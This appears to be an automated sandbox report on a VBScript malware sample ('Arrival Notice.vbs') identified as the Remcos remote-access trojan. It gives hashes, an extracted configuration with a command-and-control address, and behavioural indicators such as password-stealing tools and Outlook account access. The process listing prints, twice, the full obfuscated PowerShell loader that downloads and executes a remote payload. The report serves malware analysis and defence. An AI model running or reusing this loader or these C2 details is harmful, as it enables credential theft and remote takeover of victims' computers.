Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-12-2024 08:05
Static task
static1
Behavioral task
behavioral1
Sample
Arrival Notice.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Arrival Notice.vbs
Resource
win10v2004-20241007-en
General
-
Target
Arrival Notice.vbs
-
Size
10KB
-
MD5
edd6dd584636576b9ed73d01a8dc2d71
-
SHA1
fa62d8bdc40beecdf037ed9da244730c685716ee
-
SHA256
afbd22ee9bd00bc71554de232ad2864d09011d0c5b8092b192172db9a58abda2
-
SHA512
d92a481d431ff3e8e7bd280299f6cb69b01592c14248d9077f32b4b7080d31c1cf0e599e87cfcd5b2ae2817b728c991b86d51d28c8ce8846eb04b2b503b216eb
-
SSDEEP
192:rz+4vQA3AcB5wF3VtGBpHvFoY0+PcazUpa4N1FPE0Jcct9n72f:v+4vX3AcBKtCPHvOYBP7QMwjECtlQ
Malware Config
Extracted
remcos
RemoteHost
154.216.17.190:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-3W6OXK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2476-63-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1672-65-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/1304-64-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/1304-64-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/1672-65-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
flow pid Process 15 4124 powershell.exe 25 2616 msiexec.exe 27 2616 msiexec.exe 29 2616 msiexec.exe 30 2616 msiexec.exe 32 2616 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2616 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2200 powershell.exe 2616 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2616 set thread context of 1672 2616 msiexec.exe 103 PID 2616 set thread context of 1304 2616 msiexec.exe 104 PID 2616 set thread context of 2476 2616 msiexec.exe 105 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4124 powershell.exe 4124 powershell.exe 2200 powershell.exe 2200 powershell.exe 2200 powershell.exe 2476 msiexec.exe 2476 msiexec.exe 1672 msiexec.exe 1672 msiexec.exe 1672 msiexec.exe 1672 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2200 powershell.exe 2616 msiexec.exe 2616 msiexec.exe 2616 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4124 powershell.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeDebugPrivilege 2476 msiexec.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2808 wrote to memory of 4124 2808 WScript.exe 84 PID 2808 wrote to memory of 4124 2808 WScript.exe 84 PID 2200 wrote to memory of 2616 2200 powershell.exe 99 PID 2200 wrote to memory of 2616 2200 powershell.exe 99 PID 2200 wrote to memory of 2616 2200 powershell.exe 99 PID 2200 wrote to memory of 2616 2200 powershell.exe 99 PID 2616 wrote to memory of 1672 2616 msiexec.exe 103 PID 2616 wrote to memory of 1672 2616 msiexec.exe 103 PID 2616 wrote to memory of 1672 2616 msiexec.exe 103 PID 2616 wrote to memory of 1672 2616 msiexec.exe 103 PID 2616 wrote to memory of 1304 2616 msiexec.exe 104 PID 2616 wrote to memory of 1304 2616 msiexec.exe 104 PID 2616 wrote to memory of 1304 2616 msiexec.exe 104 PID 2616 wrote to memory of 1304 2616 msiexec.exe 104 PID 2616 wrote to memory of 2476 2616 msiexec.exe 105 PID 2616 wrote to memory of 2476 2616 msiexec.exe 105 PID 2616 wrote to memory of 2476 2616 msiexec.exe 105 PID 2616 wrote to memory of 2476 2616 msiexec.exe 105
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arrival Notice.vbs"1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$socialpensionerne='Aeonisms';;$undercapitalisations='Finsk';;$Plumpeste='Defeater191';;$Lysegrnnes='Tetractine';;$Teledendrite=$host.Name; function Aswan($Laconicness){If ($Teledendrite) {$Francisca='sindal181';$sigatoka=3;$Tingbogsattests=$sigatoka}do{$Fertiles+=$Laconicness[$Tingbogsattests];$Tingbogsattests+=4} until(!$Laconicness[$Tingbogsattests])$Fertiles}function mumpishness($Afpatruljeret){ .($Massage) ($Afpatruljeret)}$Dyrlgebil=Aswan ' U,n spe grTHus.MobW';$Dyrlgebil+=Aswan 'BluEsikbH aCfamLDanITraeNonNP eT';$Genetablerende=Aswan 'CarMst.oE szP.riPoll,arlCataRed/';$Uncrystallisable=Aswan ' I Tpr.lAc.sMat1,oc2';$tillringerne='Int[UdsNMileProt fs.TaksDu,e IkRJoyvlftisigcRefeHaaPR boMauiMagnDettNo m BrALe N PiaBolg ee syruvi]Bal:si,:NyasHijeEkscspruca rskiiTalTIm YFalPOverTonoDertLysODe CgriopenLs l=f l$B suun.Nscac ir BayTo sUniTWheaMyeLFinlPreiI.tsRioase.BFill Fie';$Genetablerende+=Aswan ' il5Un . Fo0 Ya C (MahWTr i asnEludPo oMalwP os Bi CipNAfrT on i1 vi0Con.scr0Ove; sn ca.WNotiBe,nGia6her4see; e DamxFtp6Dis4spe;Raa FlerV.jv np:Mi.1Pop3 Di1 in.Ant0The)M.t suGAcueAn cDouk Teosin/G,n2Ele0M,m1Nov0sna0Tal1Bra0Gyl1res nsF t iExorFineUdbfAcroAn.xtul/Mor1Ecc3Dra1 Vi.sci0';$Eire=Aswan 'U.nUpersNskeRetREle-scrANedgKi EOmsn upt';$Udadvendendes=Aswan ' CehBovtC at CrpE bsAfm: i/Pr /B umgruhrotl nc as. Ams O h asoshap Ci/ ntv ydlU dEYarOEmixsidoHypqbypCHal/besAH baGlabsaneH.mn ,ah CheBoldDigeDicnU.tssto. nip,lar atm';$Taramasalata=Aswan 'Ord>';$Massage=Aswan 'sl.iMatEVirx';$Cumulating='Overvejelsens';$systemprdikats='\Hovedperson.Chu';mumpishness (Aswan 'Vio$.ing UnlOprObonBCapA.prlflu: biUFaiR usL tPLgtRInfOstaGCi 1Ama2ska0swe=Mar$stoeUncN .avPar:Re aBeaPOmfPBl D k,aAm.tGufAPro+Pyx$ ulsRe yny,sC.bTsgeEspomVagp ydRs.hdUn i afKLigAWa tst,s');mumpishness (Aswan 'Brn$EcogNonL,esO TybAn,aspal Ou:EleFKvsrcubysphs PaERumPFr UBilNAfnk Bat lvsAllsD,nNFloK renTopIUntN reGTriEFedrA s= Fa$InfuHagdLysAstrdBryv reJu NUdfdBilEBa nCardCone igsFre.Anfs,kops.rl.isIfraTsed( or$ ArT ipaRefrpelAsamMParaRhasPreAK.lL syaBlotK,mAD s)');mumpishness (Aswan $tillringerne);$Udadvendendes=$Frysepunktssnkninger[0];$Linienummers=(Aswan ' p$ CegFuklUntO P b.piANetl,yk:T.mM G.UAssDmedw laOReersepT sk=IdonAu,eBorWUn,- oxo,utb B,JIlleMutc UnTBra Behs .jYBa.sUndt M ePlemDat.Ant$ F d FoyGerRnepl InGPeneKn,BVa.i igl');mumpishness ($Linienummers);mumpishness (Aswan ' ta$RetMFluu .mdlanwNa.o.orr Kotsou.HvlHRnneEr,a ,kdgameKalrBegs et[Acc$ ,aE,eoiH ar .eeMid] ac= ag$ HaGU.seU.inPa.eKo t GaaAntb HvlFreeKetre teHjdntjedFr,e');$Nrgaaendes=Aswan ' av$ tiMstrustrd.oswNelosmarTa.tPyg.PlaDA koforwHutn ollr io NoaLigd A F Uli LelBroeElu(Gu $TriURepd rua OpdG.avToxee rnRetdEk eT.nnDagdKapeM.ysPer,Luf$ inuFisd .yfob aLysl KldLepsse vG,aisexn E kIbee Ril Dis No)';$udfaldsvinkels=$Ursprog120;mumpishness (Aswan 'sup$semGs bl alOKunBluba hilPut:ArddFl.eF tkBakLpaaAIrrrBeveLedr eiDasndregsmie inREftN Coe Te=smy(sliTOveeVelsGrnTDaa- ilp RoaRemT elhTag Ad$LanUCroD AgF saaBeslBomdGapsTraVB.eIRa,NNonkMoneBroL ResDim)');while (!$Deklareringerne) {mumpishness (Aswan 'Hal$RptgCoslsmeo .obspiaExplLan: NiIMaknIndtDoneForrskoeBrusPets ,oeFonnGayt ,is UnkGama BebAl eribt ro=saa$DanCKleaFo,r ictKnue hlLusi LuzPapiConn,igg') ;mumpishness $Nrgaaendes;mumpishness (Aswan 'MegsTeytKonaLanRUdsTsel-AorsBe lAf,EUniE P.Pski a4');mumpishness (Aswan ' .n$steg,nclProohelbsliA hLFe :P oD PreEndKResls rAForr oeCoarBepIsurnKomgLaceTorrTrknskaeTos=T l(systCh Esv sReatCi -TetpResAForT rhRe shu$RepU ,ldEleFLivA amL,redPapsIngVMo.ib lN,onk,quEMisL .ps ,o)') ;mumpishness (Aswan ' i$prog.enL WioA.fBMira rdLU s:Tilo BoPPinhAf iCelocomsUnsTForaPreps,mhTorYDiaLAmieLyn=Te,$s,rg ReLVaao A bTabastrl us:WeeUKulNUdldGeiE turEffAsalgC.nE ChNExhcDroYPa + Gl+be %.an$somfDe ROutyFols TieforPFlgUM tn sakZonTT xsmols OuNBegkA kN s iBnhnO eG C,e UnrHer. AbcspaoDi,uAlnn rdt') ;$Udadvendendes=$Frysepunktssnkninger[$Ophiostaphyle]}$Tingbogsattestsmmunosuppressants=302555;$federalistens=28591;mumpishness (Aswan 'Heb$HjrG sulTwiO spB T.aRevLHer:KonsspaV EneRoosUndk Pae losVeg Fos=Gal PangskgEdetT,es- ntC Maosk NB tt TaeCarNMilT,aa For$jeduLaudPoefPseasrbL.nvD Res FlvMetispnNFejK FaeKo LDors');mumpishness (Aswan 'Uns$skrg omlMotoFoob,alaGaslDyb:NonsDivoBa m X n Ime,slrW b Cap=Unm Dra[UnisVa ystisT,st JeeA.hm c.Oc C ,noAnsnA nvcareAerrUdkt Bu]Bde: os:V uFDatrEasoPromEtaBD baAngsPune No6Afs4skesHabtCharLaniskens pg sb(De,$K,fsma v imeBibsFosks.peGuasAlp)');mumpishness (Aswan 'Voc$ acgBatlInkOBjrBGria CrL Ra:Perfs rOBlerBasgUdsINegFAantFi ePlaTTyp2Ove1Oms1Jul And=Ani Bo[ e.s ViYs,ls imT D E arM w .CurtLavEKonxhamt Ti.AfgE BinPalCBibO P DPolIRegnPi gHa ] yr: sk:Du AUndsRygc HoICooi Pe.BregFreeperTsatsPhyTPa.rskrI lenUn GCra(Bil$ Rasun.o reMHjeNFr eMa R J )');mumpishness (Aswan 'U m$sumgAntLTopoOlyB DiaT el nv:RenV s rArbD,kkIB ogRadHsd.e ysDswieDa rTossI k=Als$A eFsrgoRecR,aoG abiF efA.yt.ndEChiTp,l2 ru1Jor1 Ol.GalsTy UN mbTrosvi.th fR Ani rNDecGEks(sta$ spt MeI FoN ElGCloBudtoEnvg ResPixA TaTP ot spE HjsTerTKabsPenman,mToru eonMenOUncsRadUPaap ldP eaRgule BisC ms Dia agn PaTsnysInd,Unb$JagFTroe suDTr eAllRTraAgudl soIWi.sj.oT PeeNatNstasDos)');mumpishness $Vrdigheders;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$socialpensionerne='Aeonisms';;$undercapitalisations='Finsk';;$Plumpeste='Defeater191';;$Lysegrnnes='Tetractine';;$Teledendrite=$host.Name; function Aswan($Laconicness){If ($Teledendrite) {$Francisca='sindal181';$sigatoka=3;$Tingbogsattests=$sigatoka}do{$Fertiles+=$Laconicness[$Tingbogsattests];$Tingbogsattests+=4} until(!$Laconicness[$Tingbogsattests])$Fertiles}function mumpishness($Afpatruljeret){ .($Massage) ($Afpatruljeret)}$Dyrlgebil=Aswan ' U,n spe grTHus.MobW';$Dyrlgebil+=Aswan 'BluEsikbH aCfamLDanITraeNonNP eT';$Genetablerende=Aswan 'CarMst.oE szP.riPoll,arlCataRed/';$Uncrystallisable=Aswan ' I Tpr.lAc.sMat1,oc2';$tillringerne='Int[UdsNMileProt fs.TaksDu,e IkRJoyvlftisigcRefeHaaPR boMauiMagnDettNo m BrALe N PiaBolg ee syruvi]Bal:si,:NyasHijeEkscspruca rskiiTalTIm YFalPOverTonoDertLysODe CgriopenLs l=f l$B suun.Nscac ir BayTo sUniTWheaMyeLFinlPreiI.tsRioase.BFill Fie';$Genetablerende+=Aswan ' il5Un . Fo0 Ya C (MahWTr i asnEludPo oMalwP os Bi CipNAfrT on i1 vi0Con.scr0Ove; sn ca.WNotiBe,nGia6her4see; e DamxFtp6Dis4spe;Raa FlerV.jv np:Mi.1Pop3 Di1 in.Ant0The)M.t suGAcueAn cDouk Teosin/G,n2Ele0M,m1Nov0sna0Tal1Bra0Gyl1res nsF t iExorFineUdbfAcroAn.xtul/Mor1Ecc3Dra1 Vi.sci0';$Eire=Aswan 'U.nUpersNskeRetREle-scrANedgKi EOmsn upt';$Udadvendendes=Aswan ' CehBovtC at CrpE bsAfm: i/Pr /B umgruhrotl nc as. Ams O h asoshap Ci/ ntv ydlU dEYarOEmixsidoHypqbypCHal/besAH baGlabsaneH.mn ,ah CheBoldDigeDicnU.tssto. nip,lar atm';$Taramasalata=Aswan 'Ord>';$Massage=Aswan 'sl.iMatEVirx';$Cumulating='Overvejelsens';$systemprdikats='\Hovedperson.Chu';mumpishness (Aswan 'Vio$.ing UnlOprObonBCapA.prlflu: biUFaiR usL tPLgtRInfOstaGCi 1Ama2ska0swe=Mar$stoeUncN .avPar:Re aBeaPOmfPBl D k,aAm.tGufAPro+Pyx$ ulsRe yny,sC.bTsgeEspomVagp ydRs.hdUn i afKLigAWa tst,s');mumpishness (Aswan 'Brn$EcogNonL,esO TybAn,aspal Ou:EleFKvsrcubysphs PaERumPFr UBilNAfnk Bat lvsAllsD,nNFloK renTopIUntN reGTriEFedrA s= Fa$InfuHagdLysAstrdBryv reJu NUdfdBilEBa nCardCone igsFre.Anfs,kops.rl.isIfraTsed( or$ ArT ipaRefrpelAsamMParaRhasPreAK.lL syaBlotK,mAD s)');mumpishness (Aswan $tillringerne);$Udadvendendes=$Frysepunktssnkninger[0];$Linienummers=(Aswan ' p$ CegFuklUntO P b.piANetl,yk:T.mM G.UAssDmedw laOReersepT sk=IdonAu,eBorWUn,- oxo,utb B,JIlleMutc UnTBra Behs .jYBa.sUndt M ePlemDat.Ant$ F d FoyGerRnepl InGPeneKn,BVa.i igl');mumpishness ($Linienummers);mumpishness (Aswan ' ta$RetMFluu .mdlanwNa.o.orr Kotsou.HvlHRnneEr,a ,kdgameKalrBegs et[Acc$ ,aE,eoiH ar .eeMid] ac= ag$ HaGU.seU.inPa.eKo t GaaAntb HvlFreeKetre teHjdntjedFr,e');$Nrgaaendes=Aswan ' av$ tiMstrustrd.oswNelosmarTa.tPyg.PlaDA koforwHutn ollr io NoaLigd A F Uli LelBroeElu(Gu $TriURepd rua OpdG.avToxee rnRetdEk eT.nnDagdKapeM.ysPer,Luf$ inuFisd .yfob aLysl KldLepsse vG,aisexn E kIbee Ril Dis No)';$udfaldsvinkels=$Ursprog120;mumpishness (Aswan 'sup$semGs bl alOKunBluba hilPut:ArddFl.eF tkBakLpaaAIrrrBeveLedr eiDasndregsmie inREftN Coe Te=smy(sliTOveeVelsGrnTDaa- ilp RoaRemT elhTag Ad$LanUCroD AgF saaBeslBomdGapsTraVB.eIRa,NNonkMoneBroL ResDim)');while (!$Deklareringerne) {mumpishness (Aswan 'Hal$RptgCoslsmeo .obspiaExplLan: NiIMaknIndtDoneForrskoeBrusPets ,oeFonnGayt ,is UnkGama BebAl eribt ro=saa$DanCKleaFo,r ictKnue hlLusi LuzPapiConn,igg') ;mumpishness $Nrgaaendes;mumpishness (Aswan 'MegsTeytKonaLanRUdsTsel-AorsBe lAf,EUniE P.Pski a4');mumpishness (Aswan ' .n$steg,nclProohelbsliA hLFe :P oD PreEndKResls rAForr oeCoarBepIsurnKomgLaceTorrTrknskaeTos=T l(systCh Esv sReatCi -TetpResAForT rhRe shu$RepU ,ldEleFLivA amL,redPapsIngVMo.ib lN,onk,quEMisL .ps ,o)') ;mumpishness (Aswan ' i$prog.enL WioA.fBMira rdLU s:Tilo BoPPinhAf iCelocomsUnsTForaPreps,mhTorYDiaLAmieLyn=Te,$s,rg ReLVaao A bTabastrl us:WeeUKulNUdldGeiE turEffAsalgC.nE ChNExhcDroYPa + Gl+be %.an$somfDe ROutyFols TieforPFlgUM tn sakZonTT xsmols OuNBegkA kN s iBnhnO eG C,e UnrHer. AbcspaoDi,uAlnn rdt') ;$Udadvendendes=$Frysepunktssnkninger[$Ophiostaphyle]}$Tingbogsattestsmmunosuppressants=302555;$federalistens=28591;mumpishness (Aswan 'Heb$HjrG sulTwiO spB T.aRevLHer:KonsspaV EneRoosUndk Pae losVeg Fos=Gal PangskgEdetT,es- ntC Maosk NB tt TaeCarNMilT,aa For$jeduLaudPoefPseasrbL.nvD Res FlvMetispnNFejK FaeKo LDors');mumpishness (Aswan 'Uns$skrg omlMotoFoob,alaGaslDyb:NonsDivoBa m X n Ime,slrW b Cap=Unm Dra[UnisVa ystisT,st JeeA.hm c.Oc C ,noAnsnA nvcareAerrUdkt Bu]Bde: os:V uFDatrEasoPromEtaBD baAngsPune No6Afs4skesHabtCharLaniskens pg sb(De,$K,fsma v imeBibsFosks.peGuasAlp)');mumpishness (Aswan 'Voc$ acgBatlInkOBjrBGria CrL Ra:Perfs rOBlerBasgUdsINegFAantFi ePlaTTyp2Ove1Oms1Jul And=Ani Bo[ e.s ViYs,ls imT D E arM w .CurtLavEKonxhamt Ti.AfgE BinPalCBibO P DPolIRegnPi gHa ] yr: sk:Du AUndsRygc HoICooi Pe.BregFreeperTsatsPhyTPa.rskrI lenUn GCra(Bil$ Rasun.o reMHjeNFr eMa R J )');mumpishness (Aswan 'U m$sumgAntLTopoOlyB DiaT el nv:RenV s rArbD,kkIB ogRadHsd.e ysDswieDa rTossI k=Als$A eFsrgoRecR,aoG abiF efA.yt.ndEChiTp,l2 ru1Jor1 Ol.GalsTy UN mbTrosvi.th fR Ani rNDecGEks(sta$ spt MeI FoN ElGCloBudtoEnvg ResPixA TaTP ot spE HjsTerTKabsPenman,mToru eonMenOUncsRadUPaap ldP eaRgule BisC ms Dia agn PaTsnysInd,Unb$JagFTroe suDTr eAllRTraAgudl soIWi.sj.oT PeeNatNstasDos)');mumpishness $Vrdigheders;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\blvjcjqptab"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1672
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lnaudbbjhittoi"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1304
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ohnmwtmlvqlgzwfyg"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5c3c5f2de99b7486f697634681e21bab0
SHA100f90d495c0b2b63fde6532e033fdd2ade25633d
SHA25676296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582
SHA5127c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8
-
Filesize
431KB
MD57f5c92d80f424f58341196446b1445bf
SHA1ee1935a922f128b85997e22d837d766d9b68b5f1
SHA256c4091502129b00d4dba538ad22f80ff6085903ffb471b5b6e1995089f05226a1
SHA512539e4332bad8299912e2baf1b1d815142437dc793f60167ac92d674e1a3d9b74711c4a09db0c37c4922e8311fa1034a4f82048b505860b57f5fb387dfbc77b8c